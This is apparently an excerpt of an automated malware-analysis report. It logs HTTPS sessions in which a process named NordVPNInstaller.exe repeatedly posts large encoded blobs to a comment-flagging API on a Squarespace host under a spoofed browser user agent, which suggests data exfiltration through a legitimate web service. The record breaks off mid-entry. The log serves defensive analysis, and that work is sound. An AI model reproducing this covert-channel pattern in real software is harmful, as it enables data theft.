2024-09-01 19:56:23 UTC	16306	OUT	Data Raw: 50 41 79 56 6e 73 58 67 45 47 6e 38 74 59 6a 32 68 4b 59 68 77 69 46 39 34 6c 38 69 2f 6d 6e 68 44 39 37 37 74 42 63 74 51 52 6e 45 44 52 43 56 75 77 6c 38 73 6f 7a 4c 54 4a 6a 4a 61 37 37 50 47 6c 4f 79 5a 70 4c 2f 6e 35 4a 63 6b 6f 44 25 32 42 71 51 45 61 45 7a 49 43 77 31 4e 37 7a 4c 34 6b 4c 34 70 64 6d 63 66 45 69 51 6e 61 57 32 4c 4e 67 55 73 78 31 67 2f 79 4c 66 2f 5a 47 39 39 37 6a 5a 57 50 36 44 69 54 56 50 44 44 31 38 4d 79 46 34 42 6d 58 67 35 65 37 41 6e 4f 4e 58 6f 25 32 42 54 77 49 58 4a 43 6a 6b 50 73 63 53 25 32 42 50 49 59 67 4f 37 44 34 5a 55 30 39 47 44 52 4f 76 47 53 53 76 4f 65 79 49 55 34 36 70 57 72 67 66 76 37 6c 57 72 4c 66 32 57 58 74 38 46 63 6a 5a 6d 6c 63 39 4e 61 6b 35 5a 41 70 4c 58 4c 4d 7a 74 39 6b 73 4a 44 4e 77 67 7a 37 Data Ascii: PAyVnsXgEGn8tYj2hKYhwiF94l8i/mnhD977tBctQRnEDRCVuwl8sozLTJjJa77PGlOyZpL/n5JckoD%2BqQEaEzICw1N7zL4kL4pdmcfEiQnaW2LNgUsx1g/yLf/ZG997jZWP6DiTVPDD18MyF4BmXg5e7AnONXo%2BTwIXJCjkPscS%2BPIYgO7D4ZU09GDROvGSSvOeyIU46pWrgfv7lWrLf2WXt8FcjZmlc9Nak5ZApLXLMzt9ksJDNwgz7
2024-09-01 19:56:23 UTC	1	OUT	Data Raw: 64 Data Ascii: d
2024-09-01 19:56:23 UTC	16306	OUT	Data Raw: 55 50 47 31 59 6c 6d 66 42 4b 46 52 32 64 57 50 63 32 4a 44 77 4c 4d 41 38 36 30 66 58 65 48 55 64 43 30 52 4b 50 41 54 47 55 6f 70 58 42 7a 59 53 4b 55 33 45 50 32 62 76 43 79 41 45 75 77 61 50 55 69 71 6e 62 61 6d 31 62 78 45 69 50 4a 70 53 57 47 33 71 78 57 32 58 77 71 43 4f 6e 25 32 42 52 6b 77 77 57 6f 66 36 34 6e 37 54 45 38 75 41 6b 4e 6d 47 44 59 39 59 42 4d 4c 44 6f 4e 71 48 32 36 50 39 4a 6b 6c 48 47 51 59 57 44 42 53 74 4d 63 4d 32 52 63 33 55 65 41 78 4f 75 42 32 32 71 52 65 65 6e 66 25 32 42 42 4c 73 59 61 4a 52 53 58 51 6c 66 52 4f 25 32 42 4e 55 6d 4c 41 54 78 34 6a 4c 37 63 4b 78 46 33 7a 4b 53 52 43 58 61 46 78 74 6e 4f 78 70 4a 50 78 61 25 32 42 78 4f 34 52 52 53 45 4b 64 6a 55 6e 54 52 35 25 32 42 35 32 64 4e 39 4c 53 47 37 43 68 67 51 Data Ascii: UPG1YlmfBKFR2dWPc2JDwLMA860fXeHUdC0RKPATGUopXBzYSKU3EP2bvCyAEuwaPUiqnbam1bxEiPJpSWG3qxW2XwqCOn%2BRkwwWof64n7TE8uAkNmGDY9YBMLDoNqH26P9JklHGQYWDBStMcM2Rc3UeAxOuB22qReenf%2BBLsYaJRSXQlfRO%2BNUmLATx4jL7cKxF3zKSRCXaFxtnOxpJPxa%2BxO4RRSEKdjUnTR5%2B52dN9LSG7ChgQ
2024-09-01 19:56:23 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:23 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BeqIGNUbMVaFNWI0MmVlNjZjMTgxNzcwNmM5MWY1MzcyMzVmNjgz; Path=/; Secure Set-Cookie: crumb=BdvTg9Exx52TNzgwNzRmZGJlZmMyNmJiOWUxNGNlMjczM2MwMmIx; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: LiKQJlaM/47b980qK Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BdvTg9Exx52TNzgwNzRmZGJlZmMyNmJiOWUxNGNlMjczM2MwMmIx"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49777	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:23 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:23 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:23 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:23 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:23 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:23 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BXvihReerdyAYWUxMDllZWQyZTBiYjk0OGU5MTQ3YTI1YjkxMWNi; Path=/; Secure Set-Cookie: crumb=BYePegv7J2LkYzhjNzU5OWM0NThmY2M4ZTViZjgxMzU0NzY3ZjRi; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: xxGxH3I0/URp5D9kD Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BYePegv7J2LkYzhjNzU5OWM0NThmY2M4ZTViZjgxMzU0NzY3ZjRi"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49778	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:24 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108350 Expect: 100-continue
2024-09-01 19:56:24 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:24 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:24 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 6d 71 67 76 78 47 42 39 55 59 31 4c 6c 43 64 58 52 65 4e 55 50 58 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 68 6c Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0ZwosumqgvxGB9UY1LlCdXReNUPXbbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQwhl
2024-09-01 19:56:24 UTC	1	OUT	Data Raw: 48 Data Ascii: H
2024-09-01 19:56:24 UTC	16306	OUT	Data Raw: 4a 38 75 54 45 6a 69 35 6e 68 57 45 58 4f 54 4e 74 68 66 67 55 6a 66 42 7a 57 4a 25 32 42 4a 2f 41 32 32 4a 5a 6a 45 53 69 6d 46 65 56 46 4b 54 6b 47 30 34 53 63 67 71 75 31 38 52 77 34 48 56 6a 52 61 52 46 48 70 43 75 4a 33 69 33 45 7a 51 36 42 41 46 50 64 69 62 6c 74 4a 58 4d 64 58 43 62 52 65 63 75 4f 78 6e 6e 67 68 71 70 58 67 47 46 51 49 4c 72 52 78 6c 6b 41 69 43 33 57 7a 36 45 4f 4a 45 35 79 34 71 33 77 4c 53 51 69 35 31 78 75 53 51 59 66 68 41 6e 48 5a 4a 52 45 47 54 41 69 55 47 6b 35 47 78 70 50 41 55 4a 7a 7a 39 71 47 32 66 4c 6b 50 65 62 59 4b 43 47 41 64 42 43 56 25 32 42 2f 35 5a 66 54 67 5a 77 34 30 51 36 4a 2f 4e 56 68 4f 6d 4a 46 42 70 4f 52 73 61 54 77 46 43 6e 6f 78 57 68 61 34 49 4a 4e 6f 2f 64 53 38 54 77 63 36 35 46 6a 54 63 6f 42 70 Data Ascii: J8uTEji5nhWEXOTNthfgUjfBzWJ%2BJ/A22JZjESimFeVFKTkG04Scgqu18Rw4HVjRaRFHpCuJ3i3EzQ6BAFPdibltJXMdXCbRecuOxnnghqpXgGFQILrRxlkAiC3Wz6EOJE5y4q3wLSQi51xuSQYfhAnHZJREGTAiUGk5GxpPAUJzz9qG2fLkPebYKCGAdBCV%2B/5ZfTgZw40Q6J/NVhOmJFBpORsaTwFCnoxWha4IJNo/dS8Twc65FjTcoBp
2024-09-01 19:56:24 UTC	1	OUT	Data Raw: 6c Data Ascii: l
2024-09-01 19:56:24 UTC	16306	OUT	Data Raw: 61 62 61 61 53 50 32 53 67 4e 2f 33 34 5a 33 39 56 42 5a 52 4c 4d 37 4f 6d 32 25 32 42 71 79 73 36 63 67 44 51 72 74 55 38 67 78 32 7a 53 51 4d 77 72 4c 30 37 71 35 62 57 54 4c 43 2f 61 7a 50 4a 5a 4c 76 6b 6a 49 58 74 66 32 71 44 43 79 32 55 59 4c 44 72 4e 77 6e 6f 52 32 37 68 43 72 74 35 61 31 6f 34 71 4e 31 6d 55 35 71 51 74 6b 52 31 41 43 56 46 59 64 6b 76 50 35 5a 38 63 65 50 44 35 46 53 35 51 39 25 32 42 44 6e 65 73 6d 45 4d 78 39 74 4d 42 41 63 67 53 47 53 45 25 32 42 6c 2f 74 67 4c 67 69 53 25 32 42 32 56 67 53 51 4d 5a 38 70 63 71 42 44 66 6b 53 4b 50 61 6e 72 39 4c 48 46 33 41 48 35 31 62 7a 77 73 48 67 78 4a 63 47 62 6f 34 4e 6d 35 78 59 4e 76 49 42 38 4a 43 59 45 48 70 55 77 7a 63 73 74 65 76 4a 2f 37 4d 79 2f 49 67 70 63 67 5a 39 63 6c 56 31 Data Ascii: abaaSP2SgN/34Z39VBZRLM7Om2%2Bqys6cgDQrtU8gx2zSQMwrL07q5bWTLC/azPJZLvkjIXtf2qDCy2UYLDrNwnoR27hCrt5a1o4qN1mU5qQtkR1ACVFYdkvP5Z8cePD5FS5Q9%2BDnesmEMx9tMBAcgSGSE%2Bl/tgLgiS%2B2VgSQMZ8pcqBDfkSKPanr9LHF3AH51bzwsHgxJcGbo4Nm5xYNvIB8JCYEHpUwzcstevJ/7My/IgpcgZ9clV1
2024-09-01 19:56:24 UTC	1	OUT	Data Raw: 39 Data Ascii: 9
2024-09-01 19:56:24 UTC	16306	OUT	Data Raw: 50 41 79 56 6e 73 58 67 45 47 6e 38 74 59 6a 32 68 4b 59 68 77 69 46 39 34 6c 38 69 2f 6d 6e 68 44 39 37 37 74 42 63 74 51 52 6e 45 44 52 43 56 75 77 6c 38 73 6f 7a 4c 54 4a 6a 4a 61 37 37 50 47 6c 4f 79 5a 70 4c 2f 6e 35 4a 63 6b 6f 44 25 32 42 71 51 45 61 45 7a 49 43 77 31 4e 37 7a 4c 34 6b 4c 34 70 64 6d 63 66 45 69 51 6e 61 57 32 4c 4e 67 55 73 78 31 67 2f 79 4c 66 2f 5a 47 39 39 37 6a 5a 57 50 36 44 69 54 56 50 44 44 31 38 4d 79 46 34 42 6d 58 67 35 65 37 41 6e 4f 4e 58 6f 25 32 42 54 77 49 58 4a 43 6a 6b 50 73 63 53 25 32 42 50 49 59 67 4f 37 44 34 5a 55 30 39 47 44 52 4f 76 47 53 53 76 4f 65 79 49 55 34 36 70 57 72 67 66 76 37 6c 57 72 4c 66 32 57 58 74 38 46 63 6a 5a 6d 6c 63 39 4e 61 6b 35 5a 41 70 4c 58 4c 4d 7a 74 39 6b 73 4a 44 4e 77 67 7a 37 Data Ascii: PAyVnsXgEGn8tYj2hKYhwiF94l8i/mnhD977tBctQRnEDRCVuwl8sozLTJjJa77PGlOyZpL/n5JckoD%2BqQEaEzICw1N7zL4kL4pdmcfEiQnaW2LNgUsx1g/yLf/ZG997jZWP6DiTVPDD18MyF4BmXg5e7AnONXo%2BTwIXJCjkPscS%2BPIYgO7D4ZU09GDROvGSSvOeyIU46pWrgfv7lWrLf2WXt8FcjZmlc9Nak5ZApLXLMzt9ksJDNwgz7
2024-09-01 19:56:24 UTC	1	OUT	Data Raw: 64 Data Ascii: d
2024-09-01 19:56:24 UTC	16306	OUT	Data Raw: 55 50 47 31 59 6c 6d 66 42 4b 46 52 32 64 57 50 63 32 4a 44 77 4c 4d 41 38 36 30 66 58 65 48 55 64 43 30 52 4b 50 41 54 47 55 6f 70 58 42 7a 59 53 4b 55 33 45 50 32 62 76 43 79 41 45 75 77 61 50 55 69 71 6e 62 61 6d 31 62 78 45 69 50 4a 70 53 57 47 33 71 78 57 32 58 77 71 43 4f 6e 25 32 42 52 6b 77 77 57 6f 66 36 34 6e 37 54 45 38 75 41 6b 4e 6d 47 44 59 39 59 42 4d 4c 44 6f 4e 71 48 32 36 50 39 4a 6b 6c 48 47 51 59 57 44 42 53 74 4d 63 4d 32 52 63 33 55 65 41 78 4f 75 42 32 32 71 52 65 65 6e 66 25 32 42 42 4c 73 59 61 4a 52 53 58 51 6c 66 52 4f 25 32 42 4e 55 6d 4c 41 54 78 34 6a 4c 37 63 4b 78 46 33 7a 4b 53 52 43 58 61 46 78 74 6e 4f 78 70 4a 50 78 61 25 32 42 78 4f 34 52 52 53 45 4b 64 6a 55 6e 54 52 35 25 32 42 35 32 64 4e 39 4c 53 47 37 43 68 67 51 Data Ascii: UPG1YlmfBKFR2dWPc2JDwLMA860fXeHUdC0RKPATGUopXBzYSKU3EP2bvCyAEuwaPUiqnbam1bxEiPJpSWG3qxW2XwqCOn%2BRkwwWof64n7TE8uAkNmGDY9YBMLDoNqH26P9JklHGQYWDBStMcM2Rc3UeAxOuB22qReenf%2BBLsYaJRSXQlfRO%2BNUmLATx4jL7cKxF3zKSRCXaFxtnOxpJPxa%2BxO4RRSEKdjUnTR5%2B52dN9LSG7ChgQ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49781	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:25 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108350 Expect: 100-continue
2024-09-01 19:56:25 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:25 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:25 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 6d 71 67 76 78 47 42 39 55 59 32 48 6a 7a 56 64 30 72 5a 56 78 6e 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 68 6c Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0ZwosumqgvxGB9UY2HjzVd0rZVxnbbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQwhl
2024-09-01 19:56:25 UTC	1	OUT	Data Raw: 48 Data Ascii: H
2024-09-01 19:56:25 UTC	16306	OUT	Data Raw: 4a 38 75 54 45 6a 69 35 6e 68 57 45 58 4f 54 4e 74 68 66 67 55 6a 66 42 7a 57 4a 25 32 42 4a 2f 41 32 32 4a 5a 6a 45 53 69 6d 46 65 56 46 4b 54 6b 47 30 34 53 63 67 71 75 31 38 52 77 34 48 56 6a 52 61 52 46 48 70 43 75 4a 33 69 33 45 7a 51 36 42 41 46 50 64 69 62 6c 74 4a 58 4d 64 58 43 62 52 65 63 75 4f 78 6e 6e 67 68 71 70 58 67 47 46 51 49 4c 72 52 78 6c 6b 41 69 43 33 57 7a 36 45 4f 4a 45 35 79 34 71 33 77 4c 53 51 69 35 31 78 75 53 51 59 66 68 41 6e 48 5a 4a 52 45 47 54 41 69 55 47 6b 35 47 78 70 50 41 55 4a 7a 7a 39 71 47 32 66 4c 6b 50 65 62 59 4b 43 47 41 64 42 43 56 25 32 42 2f 35 5a 66 54 67 5a 77 34 30 51 36 4a 2f 4e 56 68 4f 6d 4a 46 42 70 4f 52 73 61 54 77 46 43 6e 6f 78 57 68 61 34 49 4a 4e 6f 2f 64 53 38 54 77 63 36 35 46 6a 54 63 6f 42 70 Data Ascii: J8uTEji5nhWEXOTNthfgUjfBzWJ%2BJ/A22JZjESimFeVFKTkG04Scgqu18Rw4HVjRaRFHpCuJ3i3EzQ6BAFPdibltJXMdXCbRecuOxnnghqpXgGFQILrRxlkAiC3Wz6EOJE5y4q3wLSQi51xuSQYfhAnHZJREGTAiUGk5GxpPAUJzz9qG2fLkPebYKCGAdBCV%2B/5ZfTgZw40Q6J/NVhOmJFBpORsaTwFCnoxWha4IJNo/dS8Twc65FjTcoBp
2024-09-01 19:56:25 UTC	1	OUT	Data Raw: 6c Data Ascii: l
2024-09-01 19:56:25 UTC	16306	OUT	Data Raw: 61 62 61 61 53 50 32 53 67 4e 2f 33 34 5a 33 39 56 42 5a 52 4c 4d 37 4f 6d 32 25 32 42 71 79 73 36 63 67 44 51 72 74 55 38 67 78 32 7a 53 51 4d 77 72 4c 30 37 71 35 62 57 54 4c 43 2f 61 7a 50 4a 5a 4c 76 6b 6a 49 58 74 66 32 71 44 43 79 32 55 59 4c 44 72 4e 77 6e 6f 52 32 37 68 43 72 74 35 61 31 6f 34 71 4e 31 6d 55 35 71 51 74 6b 52 31 41 43 56 46 59 64 6b 76 50 35 5a 38 63 65 50 44 35 46 53 35 51 39 25 32 42 44 6e 65 73 6d 45 4d 78 39 74 4d 42 41 63 67 53 47 53 45 25 32 42 6c 2f 74 67 4c 67 69 53 25 32 42 32 56 67 53 51 4d 5a 38 70 63 71 42 44 66 6b 53 4b 50 61 6e 72 39 4c 48 46 33 41 48 35 31 62 7a 77 73 48 67 78 4a 63 47 62 6f 34 4e 6d 35 78 59 4e 76 49 42 38 4a 43 59 45 48 70 55 77 7a 63 73 74 65 76 4a 2f 37 4d 79 2f 49 67 70 63 67 5a 39 63 6c 56 31 Data Ascii: abaaSP2SgN/34Z39VBZRLM7Om2%2Bqys6cgDQrtU8gx2zSQMwrL07q5bWTLC/azPJZLvkjIXtf2qDCy2UYLDrNwnoR27hCrt5a1o4qN1mU5qQtkR1ACVFYdkvP5Z8cePD5FS5Q9%2BDnesmEMx9tMBAcgSGSE%2Bl/tgLgiS%2B2VgSQMZ8pcqBDfkSKPanr9LHF3AH51bzwsHgxJcGbo4Nm5xYNvIB8JCYEHpUwzcstevJ/7My/IgpcgZ9clV1
2024-09-01 19:56:25 UTC	1	OUT	Data Raw: 39 Data Ascii: 9
2024-09-01 19:56:25 UTC	16306	OUT	Data Raw: 50 41 79 56 6e 73 58 67 45 47 6e 38 74 59 6a 32 68 4b 59 68 77 69 46 39 34 6c 38 69 2f 6d 6e 68 44 39 37 37 74 42 63 74 51 52 6e 45 44 52 43 56 75 77 6c 38 73 6f 7a 4c 54 4a 6a 4a 61 37 37 50 47 6c 4f 79 5a 70 4c 2f 6e 35 4a 63 6b 6f 44 25 32 42 71 51 45 61 45 7a 49 43 77 31 4e 37 7a 4c 34 6b 4c 34 70 64 6d 63 66 45 69 51 6e 61 57 32 4c 4e 67 55 73 78 31 67 2f 79 4c 66 2f 5a 47 39 39 37 6a 5a 57 50 36 44 69 54 56 50 44 44 31 38 4d 79 46 34 42 6d 58 67 35 65 37 41 6e 4f 4e 58 6f 25 32 42 54 77 49 58 4a 43 6a 6b 50 73 63 53 25 32 42 50 49 59 67 4f 37 44 34 5a 55 30 39 47 44 52 4f 76 47 53 53 76 4f 65 79 49 55 34 36 70 57 72 67 66 76 37 6c 57 72 4c 66 32 57 58 74 38 46 63 6a 5a 6d 6c 63 39 4e 61 6b 35 5a 41 70 4c 58 4c 4d 7a 74 39 6b 73 4a 44 4e 77 67 7a 37 Data Ascii: PAyVnsXgEGn8tYj2hKYhwiF94l8i/mnhD977tBctQRnEDRCVuwl8sozLTJjJa77PGlOyZpL/n5JckoD%2BqQEaEzICw1N7zL4kL4pdmcfEiQnaW2LNgUsx1g/yLf/ZG997jZWP6DiTVPDD18MyF4BmXg5e7AnONXo%2BTwIXJCjkPscS%2BPIYgO7D4ZU09GDROvGSSvOeyIU46pWrgfv7lWrLf2WXt8FcjZmlc9Nak5ZApLXLMzt9ksJDNwgz7
2024-09-01 19:56:25 UTC	1	OUT	Data Raw: 64 Data Ascii: d
2024-09-01 19:56:25 UTC	16306	OUT	Data Raw: 55 50 47 31 59 6c 6d 66 42 4b 46 52 32 64 57 50 63 32 4a 44 77 4c 4d 41 38 36 30 66 58 65 48 55 64 43 30 52 4b 50 41 54 47 55 6f 70 58 42 7a 59 53 4b 55 33 45 50 32 62 76 43 79 41 45 75 77 61 50 55 69 71 6e 62 61 6d 31 62 78 45 69 50 4a 70 53 57 47 33 71 78 57 32 58 77 71 43 4f 6e 25 32 42 52 6b 77 77 57 6f 66 36 34 6e 37 54 45 38 75 41 6b 4e 6d 47 44 59 39 59 42 4d 4c 44 6f 4e 71 48 32 36 50 39 4a 6b 6c 48 47 51 59 57 44 42 53 74 4d 63 4d 32 52 63 33 55 65 41 78 4f 75 42 32 32 71 52 65 65 6e 66 25 32 42 42 4c 73 59 61 4a 52 53 58 51 6c 66 52 4f 25 32 42 4e 55 6d 4c 41 54 78 34 6a 4c 37 63 4b 78 46 33 7a 4b 53 52 43 58 61 46 78 74 6e 4f 78 70 4a 50 78 61 25 32 42 78 4f 34 52 52 53 45 4b 64 6a 55 6e 54 52 35 25 32 42 35 32 64 4e 39 4c 53 47 37 43 68 67 51 Data Ascii: UPG1YlmfBKFR2dWPc2JDwLMA860fXeHUdC0RKPATGUopXBzYSKU3EP2bvCyAEuwaPUiqnbam1bxEiPJpSWG3qxW2XwqCOn%2BRkwwWof64n7TE8uAkNmGDY9YBMLDoNqH26P9JklHGQYWDBStMcM2Rc3UeAxOuB22qReenf%2BBLsYaJRSXQlfRO%2BNUmLATx4jL7cKxF3zKSRCXaFxtnOxpJPxa%2BxO4RRSEKdjUnTR5%2B52dN9LSG7ChgQ
2024-09-01 19:56:25 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:25 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BQbKBYJId5pRMDUxYWRjYzBlOWE3YmNiNGY5OTg1MTA2MWU4NmE3; Path=/; Secure Set-Cookie: crumb=BbsNtoYy7RBBZGMwOGY4OGQ3NTZjMzk2MzZiZDRiOGNmMjU2Y2Jl; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 4lS9tp3S/dAqxd5a2 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BbsNtoYy7RBBZGMwOGY4OGQ3NTZjMzk2MzZiZDRiOGNmMjU2Y2Jl"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49780	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:25 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:25 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:25 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:25 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: 